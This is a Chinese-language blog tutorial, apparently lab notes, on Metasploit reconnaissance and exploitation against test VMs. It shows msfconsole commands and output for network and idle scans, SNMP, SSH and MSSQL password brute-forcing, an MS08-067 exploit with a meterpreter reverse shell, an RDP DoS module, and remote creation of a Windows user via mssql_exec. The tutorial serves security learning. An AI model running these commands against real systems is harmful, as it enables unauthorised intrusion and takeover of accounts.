【渗透测试笔记】之【MSF 信息搜集】
Nmap
在msf里的namp 使用方法与单独使用无差别,不再赘述。
msf5 > db_nmap -sV 192.168.172.130
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-07 16:20 CST
[*] Nmap: Nmap scan report for 192.168.172.130
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:02:A0:43 (VMware)
[*] Nmap: Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.00 seconds
auxiliary/scanner/
查看所有模块
msf5 > use auxiliary/scanner [按两次table]
主机发现
发现方式
msf5 > use auxiliary/scanner/discovery/ [按两次table]
use auxiliary/scanner/discovery/arp_sweep use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/empty_udp use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/ipv6_multicast_ping use auxiliary/scanner/discovery/udp_sweep
ARP 主机发现:
msf5 > use auxiliary/scanner/discovery/arp_sweep
# 设置目标ip,表示方式可以为192.168.1.1-192.168.1.20 或 192.168.1.1/24 或 192.168.1.1/24,192.168.2.1/24
#
msf5 auxiliary(scanner/discovery/arp_sweep) > options
# 可以伪造源ip(SHOST)与源MAC(SMAC)
# 设置线程数为20
msf5 auxiliary(scanner/discovery/arp_sweep) > set THREADS 20
msf5 auxiliary(scanner/discovery/arp_sweep) > run
[+] 192.168.172.1 appears to be up (VMware, Inc.).
[+] 192.168.172.2 appears to be up (VMware, Inc.).
[+] 192.168.172.130 appears to be up (VMware, Inc.).
[+] 192.168.172.254 appears to be up (VMware, Inc.).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
查找僵尸机(足够空闲,ipid顺序增长)
msf5 > use auxiliary/scanner/ip/ipidseqmsf5 auxiliary(scanner/ip/ipidseq) > set rhosts 192.168.172.1/24msf5 auxiliary(scanner/ip/ipidseq) > set ports 80msf5 auxiliary(scanner/ip/ipidseq) > set threads 20msf5 auxiliary(scanner/ip/ipidseq) > run
[*] 192.168.172.2's IPID sequence class: Incremental!
[*] Scanned 30 of 256 hosts (11% complete)
[*] Scanned 52 of 256 hosts (20% complete)
[*] Scanned 78 of 256 hosts (30% complete)
[*] Scanned 103 of 256 hosts (40% complete)
[*] 192.168.172.130's IPID sequence class: Incremental!
[*] Scanned 129 of 256 hosts (50% complete)
[*] Scanned 154 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] Scanned 205 of 256 hosts (80% complete)
[*] Scanned 231 of 256 hosts (90% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
发现了192.168.172.2与192.168.172.130的IPID是递增的,如果他足够空闲(没有与其它主机通信),就可以作为僵尸机代替扫描。
使用nmap 利用僵尸机进行僵尸扫描:
msf5 auxiliary(scanner/ip/ipidseq) > db_nmap -sV -PN -sI 192.168.172.130 192.168.172.133
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-08 15:12 CST
[*] Nmap: Idle scan using zombie 192.168.172.130 (192.168.172.130:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.172.133
[*] Nmap: Host is up (0.051s latency).
[*] Nmap: Not shown: 986 closed|filtered ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 7/tcp open echo
[*] Nmap: 9/tcp open discard?
[*] Nmap: 13/tcp open daytime?
[*] Nmap: 17/tcp open qotd Windows qotd (English)
[*] Nmap: 19/tcp open chargen
[*] Nmap: 53/tcp open domain?
[*] Nmap: 80/tcp open http Microsoft IIS httpd 6.0
[*] Nmap: 135/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds Microsoft Windows 2003 or 2008 microsoft-ds
[*] Nmap: 1025/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1028/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 1029/tcp open msrpc Microsoft Windows RPC
[*] Nmap: 3389/tcp open ms-wbt-server Microsoft Terminal Service
端口扫描(推荐使用nmap,效率更高)
扫描方式
msf5 > use auxiliary/scanner/portscan/ [按两次table]
use auxiliary/scanner/portscan/ack use auxiliary/scanner/portscan/syn use auxiliary/scanner/portscan/xmas
use auxiliary/scanner/portscan/ftpbounce use auxiliary/scanner/portscan/tcp
syn扫描
msf5 > use auxiliary/scanner/portscan/syn
msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.172.130
msf5 auxiliary(scanner/portscan/syn) > set ports 80
msf5 auxiliary(scanner/portscan/syn) > set threads 50
msf5 auxiliary(scanner/portscan/syn) > run
SNMP扫描
破解
msf5 > use auxiliary/scanner/snmp/snmp_loginmsf5 auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.172.135msf5 auxiliary(scanner/snmp/snmp_login) > set threads 10msf5 auxiliary(scanner/snmp/snmp_login) > run
破解了一个只读权限的账户
[+] 192.168.172.135:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
读取信息
msf5 auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enummsf5 auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.172.135msf5 auxiliary(scanner/snmp/snmp_enum) > run
[*] System information:Host IP : 192.168.172.135
Hostname : bingyi-virtual-machine
Description : Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Contact : Me <me@example.org>
Location : Sitting on the Dock of the Bay
Uptime snmp : 11:18:08.39
Uptime system : 00:06:23.04
System date : 2020-11-9 10:51:42.0
windows:
# 枚举用户信息
use auxiliary/scanner/snmp/snmp_enumusers
# 枚举文件共享信息
use auxiliary/scanner/snmp/snmp_enumshares
SMB扫描
发现
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.172.131msf5 auxiliary(scanner/smb/smb_version) > run
[*] 192.168.172.131:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
[*] 192.168.172.131:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
扫描命名管道
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/pipe_auditormsf5 auxiliary(scanner/smb/pipe_auditor) > set rhosts 192.168.172.131msf5 auxiliary(scanner/smb/pipe_auditor) > run
枚举共享
msf5 auxiliary(scanner/smb/pipe_auditor) > use auxiliary/scanner/smb/smb_enumshares msf5 auxiliary(scanner/smb/smb_enumshares) > set rhosts 192.168.172.131msf5 auxiliary(scanner/smb/smb_enumshares) > set smbuser msfadminmsf5 auxiliary(scanner/smb/smb_enumshares) > set smbpass msfadminmsf5 auxiliary(scanner/smb/smb_enumshares) > run
SSH 扫描
发现
版本扫描,如果是低版本可利用漏洞。
msf5 > use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.172.135msf5 auxiliary(scanner/ssh/ssh_version) > run
[+] 192.168.172.135:22 - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.8 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.2p2 os.vendor=Ubuntu os.family=Linux os.product=Linux os.version=16.04 os.cpe23=cpe:/o:canonical:ubuntu_linux:16.04 service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.172.135:22 - Scanned 1 of 1 hosts (100% complete)
密码爆破
msf5 > use auxiliary/scanner/ssh/ssh_loginmsf5 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.172.135msf5 auxiliary(scanner/ssh/ssh_login) > set username bingyimsf5 auxiliary(scanner/ssh/ssh_login) > set pass_file ~/Desktop/dic/shhpass.txtmsf5 auxiliary(scanner/ssh/ssh_login) > set thread 10msf5 auxiliary(scanner/ssh/ssh_login) > run
[+] 192.168.172.135:22 - Success: 'bingyi:123' 'uid=1000(bingyi) gid=1000(bingyi) groups=1000(bingyi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) Linux bingyi-virtual-machine 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 1 opened (192.168.172.129:35897 -> 192.168.172.135:22) at 2020-11-11 13:00:13 +0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
密钥爆破
msf5 auxiliary(scanner/ssh/ssh_login) > use auxiliary/scanner/ssh/ssh_login_pubkey msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set rhosts 192.168.172.135msf5 auxiliary(scanner/ssh/ssh_login_pubkey) > show optionsmsf5 auxiliary(scanner/ssh/ssh_login_pubkey) > set key_path key.txtmsf5 auxiliary(scanner/ssh/ssh_login_pubkey) > run
FTP
版本扫描
msf5 > use auxiliary/scanner/ftp/ftp_version msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
尝试匿名登录
msf5 auxiliary(scanner/ftp/ftp_version) > use auxiliary/scanner/ftp/anonymous msf5 auxiliary(scanner/ftp/anonymous) > set rhosts 192.168.172.131msf5 auxiliary(scanner/ftp/anonymous) > run
[+] 192.168.172.131:21 - 192.168.172.131:21 - Anonymous READ (220 (vsFTPd 2.3.4))
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
密码破解
略
Windows利用已获得的shell收集目标缺失补丁
获取shell,将shell注入其它进程
msf5 > use exploit/windows/smb/ms08_067_netapimsf5 exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.172.130msf5 exploit(windows/smb/ms08_067_netapi) > set target 34msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms08_067_netapi) > run -j
# 进入会话
msf5 exploit(windows/smb/ms08_067_netapi) > session 2
# 显示shell当前所在进程
meterpreter > getpid
# 显示目标主机所有进程
meterpreter > ps
# 将shell注入进程其它进程
meterpreter > migrate 880
# 若之后报错[-] Known bug in WMI query, try migrating to another process,需要再注入其它进程
获取未安装补丁
msf5 exploit(windows/smb/ms08_067_netapi) > use post/windows/gather/enum_patches msf5 post(windows/gather/enum_patches) > set session 2msf5 post(windows/gather/enum_patches) > run
VNC
密码破解
msf5 > use auxiliary/scanner/vnc/vnc_login
msf5 auxiliary(scanner/vnc/vnc_login) > show options
尝试空密码登录
msf5 > use auxiliary/scanner/vnc/vnc_none_auth
RDP 远程桌面漏洞
检查是否存在某个漏洞
msf5 > use auxiliary/scanner/rdp/ms12_020_check
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...
利用
msf5 auxiliary(scanner/rdp/ms12_020_check) > search ms12-020
msf5 auxiliary(scanner/rdp/ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf5 auxiliary(scanner/rdp/ms12_020_check) > show options
...
MSSQL
端口查询
默认端口:TCP1433(或动态端口)
动态端口查询方法:
msf5 > use auxiliary/scanner/mssql/mssql_pingmsf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.172.135msf5 auxiliary(scanner/mssql/mssql_ping) > run
密码爆破
msf5 > use auxiliary/scanner/mssql/mssql_loginmsf5 auxiliary(scanner/mssql/mssql_login) > set rhosts 192.168.172.135
# 如果是动态端口需手动配置
msf5 auxiliary(scanner/mssql/mssql_login) > set rport 49165msf5 auxiliary(scanner/mssql/mssql_login) > set threads 10msf5 auxiliary(scanner/mssql/mssql_login) > set pass_file pass.txtmsf5 auxiliary(scanner/mssql/mssql_login) > run
远程执行代码
在已知端口,账户,密码后,就可以执行远程命令。
msf5 > use auxiliary/admin/mssql/mssql_execmsf5 auxiliary(admin/mssql/mssql_exec) > set rhosts 192.168.172.135msf5 auxiliary(admin/mssql/mssql_exec) > set password 123
# 动态端口使用
msf5 auxiliary(admin/mssql/mssql_exec) > set rport 49165
# 执行命令为添加一个用户
msf5 auxiliary(admin/mssql/mssql_exec) > set CMD net user user pass /ADD
获取应用版本后搜索利用漏洞
msf5 > use auxiliary/scanner/ftp/ftp_version
msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.172.131
msf5 auxiliary(scanner/ftp/ftp_version) > run
[+] 192.168.172.131:21 - FTP Banner: '220 (vsFTPd 2.3.4)\x0d\x0a'
[*] 192.168.172.131:21 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
如知道ftp版本为2.3.4后可根据版本信息搜索:
msf5 auxiliary(scanner/ftp/ftp_login) > search 2.3.4
Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 auxiliary/gather/teamtalk_creds normal No TeamTalk Gather Credentials1 exploit/multi/http/oscommerce_installer_unauth_code_exec 2018-04-30 excellent Yes osCommerce Installer Unauthenticated Code Execution2 exploit/multi/http/struts2_namespace_ognl 2018-08-22 excellent Yes Apache Struts 2 Namespace Redirect OGNL Injection3 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution4 exploit/unix/http/zivif_ipcheck_exec 2017-09-01 excellent Yes Zivif Camera iptest.cgi Blind Remote Command ExecutionInteract with a module by name or index, for example use 4 or use exploit/unix/http/zivif_ipcheck_exec
【渗透测试笔记】之【MSF 信息搜集】相关推荐
- 《MetaSploit渗透测试魔鬼训练营》之信息搜集
目录 通过DNS和IP挖掘(踩点) whois域名注册信息查询 拓扑路径 网站目录 主机.端口及服务扫描 msf主机探测 Nmap 主机端口探测 操作系统.端口及版本扫描 常见服务扫描 Telnet ...
- 网站安全渗透测试维护公司 漏洞信息搜集方法
快到十二月中旬了,很多渗透测试中的客户想要知道如何搜集这些漏洞信息和利用方式的检测,再次我们Sine安全的工程师给大家普及下如何发现漏洞以及如何去获取这些有用的信息来防护自身的网站项目平台安全,把网站 ...
- 渗透测试入门1之信息收集
渗透测试入门1之信息收集 开源情报信息收集(OSINT) github whois查询/注册人反查/邮箱反查/相关资产 google hacking 创建企业密码字典 子域名获取 字典列表 邮箱列表获 ...
- 内网渗透系列:内网信息搜集方法小结2
目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...
- [在线挑战]【i春秋】渗透测试入门 —— 渗透测试笔记 --转
[i春秋]渗透测试入门 -- 渗透测试笔记,原文 0x00 前言 本题算是一道较为综合的渗透题,要求对两个服务器系统进行渗透,第一个是基于齐博 CMS 的信息资讯平台 http://www.test. ...
- 细谈渗透测试的前期工作——信息收集
细谈渗透测试的前期工作--信息收集 前言 0x01 收集什么信息 0x02 作用和收集方法 总结 前言 都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情, ...
- web安全攻防渗透测试笔记
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
- web安全攻防渗透测试笔记 (信安一班 李静)
第三章sqlmap (1) 安装sqlmap前,需要先安装Python3.X Python Releases for Windows | Python.org (2) 在环境变量p ...
- 内网渗透测试:内网信息收集与上传下载
在之前的几节中,我们讲了隐藏通讯隧道技术的运用,那其实都是渗透测试的后话,接下来要讲的信息收集才是内网渗透的基础. 可以说内网渗透测试,其本质就是信息收集.信息收集的深度,直接关系到内网渗透测试的成败 ...
- 红队笔记之内网信息搜集技术要点总结
在渗透测试中信息收集的深度与广度以及对关键信息的提取与关联,将影响渗透的质量.下文对整体技术要点进行总结. 1.明确要收集的内容: 2.分析要收集内容可能存储在系统的什么位置(收集方法): 3.明确收 ...
最新文章
- 提升10倍生产力:IDEA远程一键部署SpringBoot到Docker
- ANDROID BITMAP内存限制OOM,OUT OF MEMORY
- 数据结构 树的链式存储(二叉表示法)
- Fiddler学习之——对Android应用进行抓包
- C#LeetCode刷题之#501-二叉搜索树中的众数​​​​​​​(Find Mode in Binary Search Tree)
- OCaml已经做好iOS开发准备
- 暴力破解附近局域网WiFi密码
- 38、nginx的upstream目前支持的5种方式的分配
- 软件测试需求分析方法
- 【黑灰产犯罪研究】网络水军
- MATLAB中使用plotyy绘制双纵坐标图及坐标轴设置
- 夜曲 文/江湖一劍客
- 开入量与开出量的一点总结
- 无套路,鬼灭之刃同人游戏
- (PDF统一页面大小)PDF统一缩放至A4或指定大小
- osgEarth目标选择
- Uni-app中几种常用的提示框
- NCE4 L3 Matterhorn man
- Win10任务栏重启无数次都在转圈卡死解决方法(超级简单)
- 物联网由哪四层体系结构组成